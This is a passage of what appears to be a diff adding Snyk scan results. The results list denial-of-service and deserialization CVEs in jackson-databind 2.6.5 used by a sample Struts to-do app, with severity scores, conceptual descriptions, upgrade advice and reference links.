"2024-03-11T09:53:57.258948Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:36.284440Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:50.575208Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:30.263069Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:57.258948Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in the `_deserializeWrappedValue()` function in `StdDeserializer.java`, due to resource exhaustion when processing deeply nested arrays.\r\n\r\n**NOTE:** This vulnerability is only exploitable when the non-default `UNWRAP_SINGLE_VALUE_ARRAYS` feature is enabled.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.7.1, 2.13.4.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020)\n- [Documentation](https://fasterxml.github.io/jackson-databind/javadoc/2.9/com/fasterxml/jackson/databind/DeserializationFeature.html#UNWRAP_SINGLE_VALUE_ARRAYS)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/2c4a601c626f7790cad9d3c322d244e182838288)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3590)\n", + "epssDetails": { + "percentile": "0.65501", + "probability": "0.00252", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-42003" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2022-10-02T09:41:44.046865Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-10-02T09:22:10Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2022-10-02T09:54:05Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:57.258948Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Liao Xinxi" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.1)", + "[2.7.0,2.7.9.1)", + "[2.8.0,2.8.9)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.1", + "2.7.9.1", + "2.8.9" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.9)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/JavanXD/Demo-Exploit-Jackson-RCE", + "title": "Exploit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1599", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id&%23x3D%3B1462702", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:28.679692Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:49.385289Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.167922Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:28.679692Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:49.385289Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker may exploit this issue by sending a maliciously crafted input to the `readValue` method of the `ObjectMapper`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.1, 2.7.9.1, 2.8.9 or higher.\n## References\n- [Exploit](https://github.com/JavanXD/Demo-Exploit-Jackson-RCE)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1599)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1462702)\n", + "epssDetails": { + "percentile": "0.97700", + "probability": "0.57112", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-7525" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-qxxx-2pp7-5hmx" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2017-09-14T14:43:48.569000Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.9)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2017-04-10T21:00:00Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2017-09-14T14:43:48Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.385289Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31573", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Liao Xinxi" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.1)", + "[2.7.0,2.7.9.1)", + "[2.8.0,2.8.10)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.6.7.1", + "2.7.9.1", + "2.8.10" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.10)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/e8f043d1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1680", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1737", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id&%23x3D%3B1506612", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:53.619980Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:46.857906Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:13.013603Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:46:53.619980Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:46.857906Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.1, 2.7.9.1, 2.8.10 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/e8f043d1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1680)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1737)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1506612)\n", + "epssDetails": { + "percentile": "0.92802", + "probability": "0.04801", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-15095" + ], + "CWE": [ + "CWE-184" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2017-11-07T13:13:32.343000Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.10)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2017-06-26T21:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2017-11-09T03:13:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:46.857906Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Imre Rad" + ], + "semver": { + "vulnerable": [ + "[,2.8.11)", + "[2.9.0,2.9.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.8.11", + "2.9.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/2235894210c75f624a3d0cd60bfb0434a20a18bf", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1855", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/irsl/jackson-rce-via-spel/", + "title": "PoC Project" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:06.545272Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:58.597489Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.686860Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:06.545272Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:58.597489Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the Spring libraries are available in the classpath.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.8.11, 2.9.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/2235894210c75f624a3d0cd60bfb0434a20a18bf)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1855)\n- [PoC Project](https://github.com/irsl/jackson-rce-via-spel/)\n", + "epssDetails": { + "percentile": "0.95701", + "probability": "0.13977", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-17485" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-01-11T11:41:28.547000Z", + "functions_new": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-01-10T11:41:28Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-01-22T12:30:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:58.597489Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32044", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Rui Chong" + ], + "semver": { + "vulnerable": [ + "[,2.8.11)", + "[2.9.0,2.9.4)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.8.11", + "2.9.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/GulajavaMinistudio/jackson-databind/pull/92/commits/038b471e2efde2e8f96b4e0be958d3e5a1ff1d05", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1899", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:48.440088Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:59.857985Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:07.715996Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:48.440088Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:59.857985Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) and [CVE-2017-17485](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043)). This is exploitable via two different gadgets that bypass a blacklist.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn 